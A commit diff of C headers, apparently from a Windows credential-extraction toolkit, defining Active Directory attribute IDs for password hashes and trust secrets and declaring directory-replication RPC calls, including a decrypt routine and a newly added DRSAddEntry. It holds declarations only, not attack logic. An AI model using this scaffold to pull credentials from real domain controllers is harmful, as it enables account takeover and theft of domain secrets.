#define ATT_WHEN_CREATED MAKELONG( 2, 2)
#define ATT_WHEN_CHANGED MAKELONG( 3, 2)
#define ATT_RDN MAKELONG( 1, 9)
#define ATT_OBJECT_SID MAKELONG(146, 9)
#define ATT_SAM_ACCOUNT_NAME MAKELONG(221, 9)
#define ATT_USER_PRINCIPAL_NAME MAKELONG(656, 9)
#define ATT_SERVICE_PRINCIPAL_NAME MAKELONG(771, 9)
#define ATT_SID_HISTORY MAKELONG(609, 9)
#define ATT_USER_ACCOUNT_CONTROL MAKELONG( 8, 9)
#define ATT_SAM_ACCOUNT_TYPE MAKELONG(302, 9)
#define ATT_LOGON_HOURS MAKELONG( 64, 9)
#define ATT_LOGON_WORKSTATION MAKELONG( 65, 9)
#define ATT_LAST_LOGON MAKELONG( 52, 9)
#define ATT_PWD_LAST_SET MAKELONG( 96, 9)
#define ATT_ACCOUNT_EXPIRES MAKELONG(159, 9)
#define ATT_LOCKOUT_TIME MAKELONG(662, 9)
#define ATT_UNICODE_PWD MAKELONG( 90, 9)
#define ATT_NT_PWD_HISTORY MAKELONG( 94, 9)
#define ATT_DBCS_PWD MAKELONG( 55, 9)
#define ATT_LM_PWD_HISTORY MAKELONG(160, 9)
#define ATT_SUPPLEMENTAL_CREDENTIALS MAKELONG(125, 9)
#define ATT_CURRENT_VALUE MAKELONG( 27, 9)
#define ATT_TRUST_ATTRIBUTES MAKELONG(470, 9)
#define ATT_TRUST_AUTH_INCOMING MAKELONG(129, 9)
#define ATT_TRUST_AUTH_OUTGOING MAKELONG(135, 9)
#define ATT_TRUST_DIRECTION MAKELONG(132, 9)
#define ATT_TRUST_PARENT MAKELONG(471, 9)
#define ATT_TRUST_PARTNER MAKELONG(133, 9)
#define ATT_TRUST_TYPE MAKELONG(136, 9)
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context);
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(SCHEMA_PREFIX_TABLE *prefixTable, REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);
void kull_m_rpc_drsr_free_SCHEMA_PREFIX_TABLE_data(SCHEMA_PREFIX_TABLE *prefixTable);
LPSTR kull_m_rpc_drsr_OidFromAttid(SCHEMA_PREFIX_TABLE *prefixTable, ATTRTYP type);
BOOL kull_m_rpc_drsr_MakeAttid(SCHEMA_PREFIX_TABLE *prefixTable, LPCSTR szOid, ATTRTYP *att, BOOL toAdd);
ATTRVALBLOCK * kull_m_rpc_drsr_findAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid);
PVOID kull_m_rpc_drsr_findMonoAttr(SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, PVOID data, DWORD *size);
void kull_m_rpc_drsr_findPrintMonoAttr(LPCWSTR prefix, SCHEMA_PREFIX_TABLE *prefixTable, ATTRBLOCK *attributes, LPCSTR szOid, BOOL newLine);

209
modules/rpc/kull_m_rpc_ms-drsr.h
View File

@ -458,8 +458,215 @@ typedef union _DRS_MSG_DCINFOREPLY {
DRS_MSG_DCINFOREPLY_VFFFFFFFF VFFFFFFFF;
} DRS_MSG_DCINFOREPLY;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0031
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
ATTRTYP type;
BOOL valReturned;
ATTRVAL Val;
} INTFORMPROB_DRS_WIRE_V1;
typedef struct _PROBLEMLIST_DRS_WIRE_V1
{
struct _PROBLEMLIST_DRS_WIRE_V1 *pNextProblem;
INTFORMPROB_DRS_WIRE_V1 intprob;
} PROBLEMLIST_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0032
{
DSNAME *pObject;
ULONG count;
PROBLEMLIST_DRS_WIRE_V1 FirstProblem;
} ATRERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0033
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
DSNAME *pMatched;
} NAMERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0034
{
UCHAR nameRes;
UCHAR unusedPad;
USHORT nextRDN;
} NAMERESOP_DRS_WIRE_V1;
typedef struct _DSA_ADDRESS_LIST_DRS_WIRE_V1
{
struct _DSA_ADDRESS_LIST_DRS_WIRE_V1 *pNextAddress;
RPC_UNICODE_STRING *pAddress;
} DSA_ADDRESS_LIST_DRS_WIRE_V1;
typedef struct CONTREF_DRS_WIRE_V1
{
DSNAME *pTarget;
NAMERESOP_DRS_WIRE_V1 OpState;
USHORT aliasRDN;
USHORT RDNsInternal;
USHORT refType;
USHORT count;
DSA_ADDRESS_LIST_DRS_WIRE_V1 *pDAL;
struct CONTREF_DRS_WIRE_V1 *pNextContRef;
BOOL bNewChoice;
UCHAR choice;
} CONTREF_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0035
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
CONTREF_DRS_WIRE_V1 Refer;
} REFERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0036
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SECERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0037
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SVCERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0038
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} UPDERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][public] */ struct __MIDL_drsuapi_0039
{
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} SYSERR_DRS_WIRE_V1;
typedef /* [public][public][public][public][public][switch_type] */ union __MIDL_drsuapi_0040
{
ATRERR_DRS_WIRE_V1 AtrErr;
NAMERR_DRS_WIRE_V1 NamErr;
REFERR_DRS_WIRE_V1 RefErr;
SECERR_DRS_WIRE_V1 SecErr;
SVCERR_DRS_WIRE_V1 SvcErr;
UPDERR_DRS_WIRE_V1 UpdErr;
SYSERR_DRS_WIRE_V1 SysErr;
} DIRERR_DRS_WIRE_V1;
typedef /* [public][public][public][public] */ struct __MIDL_drsuapi_0099
{
unsigned long cbBuffer;
unsigned long BufferType;
BYTE *pvBuffer;
} DRS_SecBuffer;
typedef /* [public][public][public][public][public][public][public] */ struct __MIDL_drsuapi_0100
{
unsigned long ulVersion;
unsigned long cBuffers;
DRS_SecBuffer *Buffers;
} DRS_SecBufferDesc;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0134
{
DSNAME *pObject;
ATTRBLOCK AttrBlock;
} DRS_MSG_ADDENTRYREQ_V1;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0135
{
ENTINFLIST EntInfList;
} DRS_MSG_ADDENTRYREQ_V2;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0136
{
ENTINFLIST EntInfList;
DRS_SecBufferDesc *pClientCreds;
} DRS_MSG_ADDENTRYREQ_V3;
typedef /* [public][public][switch_type] */ union __MIDL_drsuapi_0137
{
DRS_MSG_ADDENTRYREQ_V1 V1;
DRS_MSG_ADDENTRYREQ_V2 V2;
DRS_MSG_ADDENTRYREQ_V3 V3;
} DRS_MSG_ADDENTRYREQ;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0138
{
GUID Guid;
NT4SID Sid;
DWORD errCode;
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
} DRS_MSG_ADDENTRYREPLY_V1;
typedef /* [public][public][public][public][public][public][public] */ struct __MIDL_drsuapi_0139
{
GUID objGuid;
NT4SID objSid;
} ADDENTRY_REPLY_INFO;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0140
{
DSNAME *pErrorObject;
DWORD errCode;
DWORD dsid;
DWORD extendedErr;
DWORD extendedData;
USHORT problem;
ULONG cObjectsAdded;
ADDENTRY_REPLY_INFO *infoList;
} DRS_MSG_ADDENTRYREPLY_V2;
typedef /* [public][public][public][public][public] */ struct __MIDL_drsuapi_0141
{
DWORD dwRepError;
DWORD errCode;
DIRERR_DRS_WIRE_V1 *pErrInfo;
} DRS_ERROR_DATA_V1;
typedef /* [public][public][public][public][switch_type] */ union __MIDL_drsuapi_0142
{
DRS_ERROR_DATA_V1 V1;
} DRS_ERROR_DATA;
typedef /* [public][public][public] */ struct __MIDL_drsuapi_0143
{
DSNAME *pdsErrObject;
DWORD dwErrVer;
DRS_ERROR_DATA *pErrData;
ULONG cObjectsAdded;
ADDENTRY_REPLY_INFO *infoList;
} DRS_MSG_ADDENTRYREPLY_V3;
typedef /* [public][public][switch_type] */ union __MIDL_drsuapi_0144
{
DRS_MSG_ADDENTRYREPLY_V1 V1;
DRS_MSG_ADDENTRYREPLY_V2 V2;
DRS_MSG_ADDENTRYREPLY_V3 V3;
} DRS_MSG_ADDENTRYREPLY;
ULONG IDL_DRSBind(handle_t rpc_handle, UUID *puuidClientDsa, DRS_EXTENSIONS *pextClient, DRS_EXTENSIONS **ppextServer, DRS_HANDLE *phDrs);
ULONG IDL_DRSUnbind(DRS_HANDLE *phDrs);
ULONG IDL_DRSGetNCChanges(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_GETCHGREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_GETCHGREPLY *pmsgOut);
ULONG IDL_DRSCrackNames(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_CRACKREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_CRACKREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);
ULONG IDL_DRSDomainControllerInfo(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_DCINFOREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_DCINFOREPLY *pmsgOut);
ULONG IDL_DRSAddEntry(DRS_HANDLE hDrs, DWORD dwInVersion, DRS_MSG_ADDENTRYREQ *pmsgIn, DWORD *pdwOutVersion, DRS_MSG_ADDENTRYREPLY *pmsgOut);

1788
modules/rpc/kull_m_rpc_ms-drsr_c.c
View File

File diff suppressed because it is too large Load Diff